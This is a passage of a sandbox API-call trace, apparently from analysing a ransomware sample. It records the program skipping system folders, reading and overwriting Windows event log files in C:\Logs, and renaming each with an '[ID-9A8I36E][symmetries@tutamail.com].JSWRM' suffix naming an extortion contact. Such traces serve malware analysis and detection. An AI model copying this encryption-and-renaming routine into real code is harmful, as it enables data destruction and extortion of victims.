1 [0066.070] CloseHandle (hObject=0x450) returned 1 [0066.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0066.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0066.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0066.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0066.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0066.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0066.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f030 [0066.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.072] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0066.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0066.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0066.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.073] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cAlternateFileName="MI2E2E~1.EVT")) returned 1 [0066.073] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2=".") returned 1 [0066.073] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="..") returned 1 [0066.073] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="...") returned 1 [0066.073] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="windows") returned -1 [0066.073] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="recovery") returned -1 [0066.073] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="perflogs") returned -1 [0066.073] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="documents and settings") returned 1 [0066.073] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.073] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="system volume information") returned -1 [0066.073] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpString2="msocache") returned -1 [0066.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0066.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0066.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cchWideChar=47, lpMultiByteStr=0x1f87c0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpUsedDefaultChar=0x0) returned 47 [0066.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0066.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0066.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0066.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cchWideChar=47, lpMultiByteStr=0x1f8328, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", lpUsedDefaultChar=0x0) returned 47 [0066.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0066.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0066.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0066.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0066.074] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.074] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.074] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0066.074] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.097] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.097] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.097] CloseHandle (hObject=0x450) returned 1 [0066.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0066.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0066.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0066.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0066.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0066.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0066.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f4d0 [0066.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.100] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0066.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0066.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0066.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.100] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Shell-Core%4Operational.evtx", cAlternateFileName="MI1C6C~1.EVT")) returned 1 [0066.100] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2=".") returned 1 [0066.101] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="..") returned 1 [0066.101] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="...") returned 1 [0066.101] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="windows") returned -1 [0066.101] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="recovery") returned -1 [0066.101] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="perflogs") returned -1 [0066.101] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.101] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.101] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="system volume information") returned -1 [0066.101] lstrcmpiW (lpString1="Microsoft-Windows-Shell-Core%4Operational.evtx", lpString2="msocache") returned -1 [0066.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0066.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Shell-Core%4Operational.evtx", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0066.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Shell-Core%4Operational.evtx", cchWideChar=46, lpMultiByteStr=0x1f8638, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Shell-Core%4Operational.evtx", lpUsedDefaultChar=0x0) returned 46 [0066.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0066.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0066.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Shell-Core%4Operational.evtx", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0066.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0066.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Shell-Core%4Operational.evtx", cchWideChar=46, lpMultiByteStr=0x1f8670, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Shell-Core%4Operational.evtx", lpUsedDefaultChar=0x0) returned 46 [0066.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0066.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0066.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0066.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0066.101] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.101] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.101] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0066.102] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.109] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.109] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.109] CloseHandle (hObject=0x450) returned 1 [0066.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0066.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0066.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0066.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0066.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0066.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0066.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f5f8 [0066.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.112] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0066.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0066.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0066.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0066.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.112] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-SmbClient%4Connectivity.evtx", cAlternateFileName="MI00FB~1.EVT")) returned 1 [0066.112] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2=".") returned 1 [0066.112] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="..") returned 1 [0066.112] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="...") returned 1 [0066.112] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="windows") returned -1 [0066.113] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="recovery") returned -1 [0066.113] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="perflogs") returned -1 [0066.113] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="documents and settings") returned 1 [0066.113] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.113] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="system volume information") returned -1 [0066.113] lstrcmpiW (lpString1="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpString2="msocache") returned -1 [0066.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0066.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SmbClient%4Connectivity.evtx", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0066.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SmbClient%4Connectivity.evtx", cchWideChar=46, lpMultiByteStr=0x1f87c0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpUsedDefaultChar=0x0) returned 46 [0066.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0066.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0066.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SmbClient%4Connectivity.evtx", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0066.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SmbClient%4Connectivity.evtx", cchWideChar=46, lpMultiByteStr=0x1f8638, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SmbClient%4Connectivity.evtx", lpUsedDefaultChar=0x0) returned 46 [0066.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0066.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0066.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0066.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0066.113] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.113] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 